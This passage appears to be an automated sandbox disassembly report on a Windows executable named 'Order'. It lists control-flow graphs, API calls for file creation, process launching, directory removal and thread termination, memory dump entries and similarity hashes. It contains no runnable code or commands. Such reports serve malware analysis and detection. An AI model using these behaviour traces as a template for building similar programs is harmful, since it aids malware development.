                      • API ID: Path$Value$QuoteSpaces$AllocateCriticalErrorHandleHeapLastSection$BackslashCloseCreateEnterEnvironmentLeaveModuleNameObjectRemoveShortSingleThreadVariableWaitwcslen
                      • String ID: *pA$*pA$pA
                      • API String ID: 1881381519-978732049
                      • Opcode ID: bf419ecd053125aa4cc63fae941d4f4937ceb88770c1d79b13fa06698ce42480
                      • Instruction ID: c37fc5d70f496ddafb25d76fc072764247fdd107690a54ecab0fee76e679e4b9
                      • Opcode Fuzzy Hash: bf419ecd053125aa4cc63fae941d4f4937ceb88770c1d79b13fa06698ce42480
                      • Instruction Fuzzy Hash: 452219B5504700AED200BBB2D981A7F77BDEB94709F10CD3FF544AA192CA3CD8499B69

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 510 40aac0-40aad6 511 40aae0-40aaf3 call 40d498 510->511 512 40aad8 510->512 515 40aca2-40acab 511->515 516 40aaf9-40ab00 511->516 512->511 517 40ab02-40ab0a 516->517 518 40ab3e-40ab41 516->518 519 40ab11-40ab17 517->519 520 40ab0c 517->520 521 40ab43-40ab4b 518->521 522 40ab7c-40ab7f 518->522 523 40ab19 519->523 524 40ab1c-40ab39 CreateFileW 519->524 520->519 525 40ab52-40ab58 521->525 526 40ab4d 521->526 527 40ab81-40ab8d 522->527 528 40abe8 522->528 523->524 531 40abec-40abef 524->531 532 40ab5a 525->532 533 40ab5d-40ab7a CreateFileW 525->533 526->525 529 40ab98-40ab9e 527->529 530 40ab8f-40ab94 527->530 528->531 534 40aba0-40aba3 529->534 535 40aba7-40abc7 CreateFileW 529->535 530->529 536 40abf5-40abf7 531->536 537 40ac8b 531->537 532->533 533->531 534->535 535->536 538 40abc9-40abe6 CreateFileW 535->538 536->537 540 40abfd-40ac04 536->540 539 40ac8f-40ac92 537->539 538->531 541 40ac94 539->541 542 40ac96-40ac9d call 40d40a 539->542 543 40ac22 540->543 544 40ac06-40ac0c 540->544 541->542 542->515 547 40ac25-40ac52 543->547 544->543 546 40ac0e-40ac20 HeapAlloc 544->546 546->547 548 40ac70-40ac79 547->548 549 40ac54-40ac5a 547->549 550 40ac7b 548->550 551 40ac7d-40ac7f 548->551 549->548 552 40ac5c-40ac6a SetFilePointer 549->552 550->551 551->539 553 40ac81-40ac8a 551->553 552->548
                      APIs
                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040AB31
                      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040AB72
                      • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040ABBC
                      • CreateFileW.KERNEL32(?,40000000,?,00000000,00000005,00000000,00000000,?,?,?,00000000,00000000), ref: 0040ABDE
                      • HeapAlloc.KERNEL32(00000000,00001000,?,?,?,?,00000000,00000000), ref: 0040AC17
                      • SetFilePointer.KERNEL32(?,00000000,?,00000002), ref: 0040AC6A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: File$Create$AllocHeapPointer
                      • String ID:
                      • API String ID: 4207849991-0
                      • Opcode ID: b3501de1549189c44e7e631b90cb851d7740b4e923cfc5c59c52eca9f0755e35
                      • Instruction ID: b1ded5e7b3c1179952fb066da43177db28dec5f90817629197f40925782b5e59
                      • Opcode Fuzzy Hash: b3501de1549189c44e7e631b90cb851d7740b4e923cfc5c59c52eca9f0755e35
                      • Instruction Fuzzy Hash: 1F51C0712483006BE3218F19DD44B6B7BF6EB44764F204A3AFA51A73E0D678EC55874A

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 554 40d819-40d838 555 40d83a-40d83c 554->555 556 40d83e-40d840 554->556 555->556 557 40d8f2-40d905 RtlAllocateHeap 556->557 558 40d846-40d869 call 40da43 EnterCriticalSection 556->558 560 40d907-40d925 557->560 561 40d93d-40d943 557->561 565 40d877-40d879 558->565 563 40d930-40d937 InitializeCriticalSection 560->563 564 40d927-40d929 560->564 563->561 564->563 566 40d92b-40d92e 564->566 567 40d86b-40d86e 565->567 568 40d87b 565->568 566->561 569 40d870-40d873 567->569 570 40d875 567->570 571 40d887-40d89b HeapAlloc 568->571 569->570 572 40d87d-40d885 569->572 570->565 573 40d8e5-40d8f0 LeaveCriticalSection 571->573 574 40d89d-40d8b8 call 40d819 571->574 572->571 572->573 573->561 574->573 577 40d8ba-40d8da 574->577 578 40d8dc 577->578 579 40d8df 577->579 578->579 579->573
                      APIs
                      • EnterCriticalSection.KERNEL32(00418624,0041861C,0040D9E2,00000000,FFFFFFED,00000200,77735E70,00409E76,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040D85A
                      • HeapAlloc.KERNEL32(00000000,00000018,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040D891
                      • LeaveCriticalSection.KERNEL32(00418624,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040D8EA
                      • RtlAllocateHeap.NTDLL(00000000,00000038,00000000,FFFFFFED,00000200,77735E70,00409E76,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040D8FB
                      • InitializeCriticalSection.KERNEL32(00000020,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040D937
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: CriticalSection$Heap$AllocAllocateEnterInitializeLeave
                      • String ID:
                      • API String ID: 1272335518-0
                      • Opcode ID: f6530bd1139fc1308a1eb69ae95df56e95dab55b3f4bf4e911806d1cb07516e8
                      • Instruction ID: b7a84fb5e76b6252515cea3da09f74f38e7866411a6d0cfbb28ace0a8fd55691
                      • Opcode Fuzzy Hash: f6530bd1139fc1308a1eb69ae95df56e95dab55b3f4bf4e911806d1cb07516e8
                      • Instruction Fuzzy Hash: 7B31AEB2E007069FC3209F95D844A56BBF5FB44714B15C67EE465A77A0CB38E908CF98

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 580 402022-402024 581 402029-402034 580->581 581->581 582 402036-4020ac call 40dfc0 call 405060 * 3 ShellExecuteExW 581->582 591 4020b0-4020cd call 405532 GetExitCodeProcess 582->591 594 4020dd 591->594 595 4020cf-4020d9 591->595 594->591 595->594 596 4020db-402106 call 40df50 * 3 595->596
                      APIs
                      • ShellExecuteExW.SHELL32(?), ref: 004020A7
                      • GetExitCodeProcess.KERNEL32(?,?), ref: 004020C6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: CodeExecuteExitProcessShell
                      • String ID: open
                      • API String ID: 1016612177-2758837156
                      • Opcode ID: 4fb2f0ec770fda151a68555488377ed97fba283763a87ea546f97f21bf454217
                      • Instruction ID: 2b8263a944a9b57d4591781c670f1b736d97a98816e9e989756960c1ab26e777
                      • Opcode Fuzzy Hash: 4fb2f0ec770fda151a68555488377ed97fba283763a87ea546f97f21bf454217
                      • Instruction Fuzzy Hash: 66219D71008309AFD700EF54C855A9FBBE8EF44304F10882EF299E2291DB79D909CF96

                      Control-flow Graph

                      APIs
                        • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                        • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                        • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                        • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                        • Part of subcall function 00409698: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
                        • Part of subcall function 00409698: wcscmp.MSVCRT ref: 004096C2
                        • Part of subcall function 00409698: memmove.MSVCRT ref: 004096DA
                        • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048,00000000), ref: 00401BCD
                      • EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BEA
                      • FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048), ref: 00401BF2
                        • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                        • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                        • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02310000,00000000,?), ref: 0040DEF9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: Value$ErrorLastLibrary$AllocateEnumFileFreeHeapLoadModuleNameResourceTypesmemmovewcscmpwcslen
                      • String ID:
                      • API String ID: 983379767-0
                      • Opcode ID: 6d644cda50eb4bb59354e9275524eabcad73a702f0dc48a96d1c9a3a24c112bc
                      • Instruction ID: 657320b8a0b9e8c73ad23a805e8a4a11547555e009ba7fb8d64ba55fc2021fd8
                      • Opcode Fuzzy Hash: 6d644cda50eb4bb59354e9275524eabcad73a702f0dc48a96d1c9a3a24c112bc
                      • Instruction Fuzzy Hash: 22514AB59047007AE2007BB2DD82E7F66AEDBD4709F10893FF944790D2C93C984996AE

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 749 40b020-40b034 750 40b127-40b12d 749->750 751 40b03a-40b03e 749->751 752 40b040-40b068 SetFilePointer 751->752 753 40b06b-40b075 751->753 752->753 754 40b077-40b082 753->754 755 40b0e8-40b0f3 call 40aa40 753->755 756 40b0d3-40b0e5 754->756 757 40b084-40b085 754->757 764 40b115-40b122 755->764 765 40b0f5-40b112 WriteFile 755->765 759 40b087-40b08a 757->759 760 40b0bc-40b0d0 757->760 762 40b0a7-40b0b9 759->762 763 40b08c-40b08d 759->763 766 40b091-40b0a4 memcpy 763->766 764->766
                      APIs
                      • SetFilePointer.KERNELBASE(?,?,?,00000001), ref: 0040B058
                      • memcpy.MSVCRT ref: 0040B092
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: FilePointermemcpy
                      • String ID:
                      • API String ID: 1104741977-0
                      • Opcode ID: 01662b736399dd0210b3166c1eac24a2b1f7f8f1802043f53fe0b6834fe756e1
                      • Instruction ID: 223037c69186752c1411635bf46ae5d03fa463101b4e1ddb65380de8071f5603
                      • Opcode Fuzzy Hash: 01662b736399dd0210b3166c1eac24a2b1f7f8f1802043f53fe0b6834fe756e1
                      • Instruction Fuzzy Hash: 93313A392047019FC320DF29D844E5BB7E1EFD4314F04882EE59A97750D335E919CBA6

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 767 40dec0-40dee7 TlsGetValue 768 40df06-40df25 RtlReAllocateHeap 767->768 769 40dee9-40df04 RtlAllocateHeap 767->769 770 40df27-40df4d call 40e3a0 768->770 769->770
                      APIs
                      • TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                      • RtlAllocateHeap.NTDLL(02310000,00000000,?), ref: 0040DEF9
                      • RtlReAllocateHeap.NTDLL(02310000,00000000,?,?), ref: 0040DF1C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: AllocateHeap$Value
                      • String ID:
                      • API String ID: 2497967046-0
                      • Opcode ID: 391403ca008f830686c32838620f38fbd141f2e22e04a7bef1baef16fc724d55
                      • Instruction ID: 93a72ebc0765164a1c418c05f64e83f02c193a946cd328b9657e87a1490d81f0
                      • Opcode Fuzzy Hash: 391403ca008f830686c32838620f38fbd141f2e22e04a7bef1baef16fc724d55
                      • Instruction Fuzzy Hash: F111B974A00208EFCB04DF98D894E9ABBB6FF88314F20C159F9099B355D735AA41DB94

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 773 40a6c5-40a6d2 774 40a6d4-40a706 wcsncpy wcslen 773->774 775 40a73d 773->775 776 40a71e-40a726 774->776 777 40a73f-40a742 775->777 778 40a708-40a70f 776->778 779 40a728-40a73b CreateDirectoryW 776->779 780 40a711-40a714 778->780 781 40a71b 778->781 779->777 780->781 782 40a716-40a719 780->782 781->776 782->779 782->781
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: CreateDirectorywcslenwcsncpy
                      • String ID:
                      • API String ID: 961886536-0
                      • Opcode ID: cc8a7ec8d54b194b434c4abf9ee5240936a68a416eca0cc9abdb5220f9513762
                      • Instruction ID: 5eb92d4f139d310a1ce384b3b75a423d404f976685da56e70024377017fd7883
                      • Opcode Fuzzy Hash: cc8a7ec8d54b194b434c4abf9ee5240936a68a416eca0cc9abdb5220f9513762
                      • Instruction Fuzzy Hash: 3E0167B180131896CB24DB64CC8DEBA73B8DF04304F6086BBE415E71D1E779DAA4DB5A

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 783 408dee-408e26 memset InitCommonControlsEx CoInitialize
                      APIs
                      • memset.MSVCRT ref: 00408DFB
                      • InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
                      • CoInitialize.OLE32(00000000), ref: 00408E1D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: CommonControlsInitInitializememset
                      • String ID:
                      • API String ID: 2179856907-0
                      • Opcode ID: 91c7401402fa2f0ea5928b71181181df8ef358baa4c0a6ad788b24867e7e8746
                      • Instruction ID: d18f3e268914b4fee2ab689e9e6bda8f6ab82eec5aee9dd7765ec6ce908ab83c
                      • Opcode Fuzzy Hash: 91c7401402fa2f0ea5928b71181181df8ef358baa4c0a6ad788b24867e7e8746
                      • Instruction Fuzzy Hash: 12E08CB088430CBBEB009BD0DC0EF8DBB7CEB00315F0041A4F904A2280EBB466488B95

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 784 4098c0-4098c5 785 4098c7-4098cd 784->785 786 4098df 784->786 787 4098d4-4098d9 SetEnvironmentVariableW 785->787 788 4098cf 785->788 787->786 788->787
                      APIs
                      • SetEnvironmentVariableW.KERNELBASE(02319778,02319778,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004098D9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: EnvironmentVariable
                      • String ID: $0A
                      • API String ID: 1431749950-513306843
                      • Opcode ID: 1c567db1f8ae5e831e25467e71350c4bb5df89e506d1786ab4261c5f7a60237e
                      • Instruction ID: a83057451cf148fd94e5dae0918d05dd15dd477b401c26288c9a060c20ad275f
                      • Opcode Fuzzy Hash: 1c567db1f8ae5e831e25467e71350c4bb5df89e506d1786ab4261c5f7a60237e
                      • Instruction Fuzzy Hash: E7C01231619201BBD710EA14C904B57BBE5EB50345F04C439B044912B0C338CC44D705

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 789 40adc0-40add9 call 40d498 792 40ae6e-40ae73 789->792 793 40addf-40adfe CreateFileW 789->793 794 40ae00-40ae02 793->794 795 40ae52-40ae55 793->795 794->795 796 40ae04-40ae0b 794->796 797 40ae57 795->797 798 40ae59-40ae60 call 40d40a 795->798 800 40ae20 796->800 801 40ae0d-40ae1e HeapAlloc 796->801 797->798 802 40ae65-40ae6b 798->802 803 40ae23-40ae4a 800->803 801->803 804 40ae4c 803->804 805 40ae4e-40ae50 803->805 804->805 805->795 805->802
                      APIs
                        • Part of subcall function 0040D498: EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000), ref: 0040D4A3
                        • Part of subcall function 0040D498: LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040D51E
                      • CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000080,00000000,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000), ref: 0040ADF3
                      • HeapAlloc.KERNEL32(00000000,00001000,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040AE15
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: CriticalSection$AllocCreateEnterFileHeapLeave
                      • String ID:
                      • API String ID: 3705299215-0
                      • Opcode ID: e305dac00e43d1f01632c500e63f0068ba79cd60e0177f680cb6723e5d67acda
                      • Instruction ID: 12139a0eb1477c71ece9156acb4b07c5ee84e209973367f4cf7a68f803bf58ce
                      • Opcode Fuzzy Hash: e305dac00e43d1f01632c500e63f0068ba79cd60e0177f680cb6723e5d67acda
                      • Instruction Fuzzy Hash: C1119331140300ABC2305F1AEC44B57BBF9EB85764F14863EF5A5A73E0C7759C158BA9

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 806 40dbca-40dbe1 call 40dd1d 809 40dbe7-40dc04 RtlAllocateHeap 806->809 810 40dc69-40dc6e 806->810 811 40dc06-40dc4c memset call 411a64 809->811 812 40dc68 809->812 811->812 815 40dc4e-40dc50 811->815 812->810 815->812 816 40dc52-40dc54 815->816 817 40dc58-40dc62 call 411e8f 816->817 820 40dc64 817->820 820->812
                      APIs
                        • Part of subcall function 0040DD1D: HeapFree.KERNEL32(00000000,-00000018,00000200,00000000,0040DBDB,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417080,00418098,00000004), ref: 0040DD5E
                      • RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 0040DBFA
                      • memset.MSVCRT ref: 0040DC35
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: Heap$AllocateFreememset
                      • String ID:
                      • API String ID: 2774703448-0
                      • Opcode ID: 5a98dcc60eb41190d4dd3f8e51887e861c9e07386c3483abd70395c86239bf10
                      • Instruction ID: c1bdd2e89517895a38d7a8cc2bcc280f97e8981c2924b00dcd90f9207400bfe8
                      • Opcode Fuzzy Hash: 5a98dcc60eb41190d4dd3f8e51887e861c9e07386c3483abd70395c86239bf10
                      • Instruction Fuzzy Hash: E51167729043149BC320DF59DC80A8BBBE8EF88B10F01492EB988A7351D774E804CBA5
                      APIs
                      • HeapFree.KERNEL32(00000000,?,00000000,00000000,?,?,004033E8,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000), ref: 0040AA13
                      • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,004033E8,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040AA1B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: ChangeCloseFindFreeHeapNotification
                      • String ID:
                      • API String ID: 1642550653-0
                      • Opcode ID: 579ea7bb730054d1301fd9c1686cb7efab9d423d292c410d1af4f5f5553bf1d6
                      • Instruction ID: 9ff7f62518d4b0577bac71a3516b051fbd3d19e36237879e48dc57cbe5217eec
                      • Opcode Fuzzy Hash: 579ea7bb730054d1301fd9c1686cb7efab9d423d292c410d1af4f5f5553bf1d6
                      • Instruction Fuzzy Hash: E0F05E32600200A7CA216B5AED05A8BBBB2EB85764B11853EF124314F5CB355860DB5D
                      APIs
                        • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                      • RemoveDirectoryW.KERNEL32(00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00417024,00000001,00000000), ref: 00402000
                      • RemoveDirectoryW.KERNEL32(00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00417024,00000001,00000000), ref: 0040200B
                        • Part of subcall function 004053C7: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002,00000000), ref: 004053D7
                        • Part of subcall function 00405436: TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 00405446
                        • Part of subcall function 00405436: EnterCriticalSection.KERNEL32(004186A8,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405452
